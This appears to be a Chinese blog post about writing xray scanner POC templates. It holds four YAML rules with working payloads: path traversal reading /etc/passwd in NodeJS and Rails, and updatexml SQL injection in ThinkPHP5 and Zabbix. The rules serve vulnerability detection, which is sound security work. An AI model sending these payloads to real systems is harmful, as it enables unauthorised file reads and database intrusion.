php写poc,xray写POC踩坑
静态文件目录不一定是static。
只考虑了linux的情况,如果是 windows 呢,能读取某些应用自己的源码吗。
实际环境参数不一定是id,thinkphp 不适合使用 poc 来写
NodeJS_path-validation_CVE-2017-14849.yml name: NodeJS_path-validation_CVE-2017-14849 rules: - method: GET path: /static/../../../a/../../../../etc/passwd headers: Accept: '' follow_redirects: false expression: | status==200 && body.bcontains(b'root:x:0:0') detail: author: 17bdw Affected Version: "NodeJS 8.5.0" links: - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
Rails_file_content_disclosure_CVE-2019-5418 name: Rails_file_content_disclosure_CVE-2019-5418 rules: - method: GET path: /robots headers: Accept: '../../../../../../../../etc/passwd{{' follow_redirects: false expression: | status==200 && body.bcontains(b'root:x:0:0') detail: author: 17bdw Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1" links: - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
thinkphp5-in-sqlinjection name: thinkphp5-in-sqlinjection rules: - method: GET path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1 expression: | body.bcontains(b'cf79ae6addba60ad018347359bd144d') detail: author: 17bdw Affected Version: "thinkphp5-in-sqlinjection" vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1" links: - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
zabbix_3.0.3_jsrpc.php_CVE-2016-10134 name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134 rules: - method: GET path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0) expression: | body.bcontains(b'cf79ae6addba60ad018347359bd144d') detail: author: 17bdw Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134" vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)" links: - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
来源:博客园
作者:17bdw
链接:https://www.cnblogs.com/17bdw/p/11515741.html
php写poc,xray写POC踩坑相关推荐
- 用latex写IEEE论文投稿的踩坑笔记
目录 预备. 安装TeXstudio 一. 下载IEEE的LaTeX模板 二. 修改引文方式 1.更新IEEEtran.bst文件 2.新建一个.txt文件,把bib格式的引文信息全都复制进去(方法如 ...
- ClickOnce踩坑记录
这里写自定义目录标题 ClickOnce踩坑记录 开发环境: 发布时异常: 安装时异常 ClickOnce踩坑记录 开发环境: win10+vs2019+.net 4.5.2 发布时异常: ERROR ...
- 使用RKNN部署CRNN模型踩坑优化历程
序言 前段时间使用RKNN部署一个文字识别模型,因为文字识别模型用的是目前最普遍使用的CRNN模型,结构也相对简单:卷积+LSTM+全连接,都是比较元老级别的算子,本来已经部署的过程会很顺利,结果发现 ...
- java调用clang编译的so_写Java这么久,JDK源码编译过没?编译JDK源码踩坑纪实
好奇害死羊 很多小伙伴们做Java开发,天天写Java代码,肯定离不开Java基础环境:JDK,毕竟我们写好的Java代码也是跑在JVM虚拟机上. 一般来说,我们学Java之前,第一步就是安装JDK环 ...
- android usb没有读写节点,2019踩坑无数含泪写下最新教程系列(三)树莓派挂载android(树莓派通过usb读取手机里面档案)...
2019踩坑无数含泪写下最新教程系列(三)树莓派挂载android(树莓派通过usb读取手机里面档案) STEP1: Install packages Install support for MTP: ...
- 【回眸】作为一位应届生,写简历的时候会踩哪些坑?
[回眸]作为一位应届生,写简历的时候会踩哪些坑? [回眸]作为一位应届生,写简历的时候会踩哪些坑? 前言 简历基本信息 简历文件名称怎么写比较好 电话号码一定要写吗? 简历上写什么邮箱比较好? 简历上 ...
- 使用VUE仿写【E宠商城】踩坑点
使用VUE仿写[E宠商城]踩坑点 1.无论是否是否写了!important 父元素的规则 都是被子元素继承的 继承的样式优先级小 所以这边的字体大小还是保留reset那边的样式!!! 2.canvas ...
- 写Java这么久,JDK源码编译过没?编译JDK源码踩坑纪实
好奇害死羊 很多小伙伴们做Java开发,天天写Java代码,肯定离不开Java基础环境:JDK,毕竟我们写好的Java代码也是跑在JVM虚拟机上. 一般来说,我们学Java之前,第一步就是安装JDK环 ...
- java顺丰运费接口_对接顺丰丰桥踩坑汇总(写给自己)
顺丰丰桥使用流程 登录注册丰桥 https://qiao.sf-express.com/index.html 申请一条龙 开发者信息 按提示搞就行了,然后会有个测试月卡,如果正式环境需要申请正式月卡 ...
最新文章
- 手机-字符串替换显示
- 为什么链接库的顺序有时会导致GCC错误?
- 初次使用Android Studio问题,Android Studio往项目中添加图片
- FFmpeg学习5:多线程播放视音频
- android同步服务启动,Android Service的基本用法(startService启动方式生命周期)
- the value of esp was not properly saved
- 远程连接Oracle 数据库连接报错ORA-12638身份检索失败
- Visual Studio 2013中因SignalR的Browser Link引起的Javascript错误一则
- MySql数据的启动和停止以及SQLyog图形化工具的下载
- Server.Variables属性大全(转载)
- 一、网络安全专有名词汇编详解(黑话指南)-史上最全
- 2019新买电脑必备软件
- 驱动开发:BSOD 0x7E(8000003)或命中断点卡住,__security_init_cookie导致
- 分析classpath、path、JAVA_HOME的作用及JAVA环境变量配置(转发博客园)
- 隐藏在office中的小游戏
- android 极光推送1011,两条推送信息,一条推送成功,一条推送失败(errcode:1011,errmsg:没有满足条件的推送目标)...
- 新型冠状病毒的持续了解
- Sigmoid 函数的求导过程
- 3blue1brown线性代数的本质笔记
- spring boot + shiro 实现登陆 踢出用户功能 (挤人) 以及UnknownSessionException异常问题 记住我功能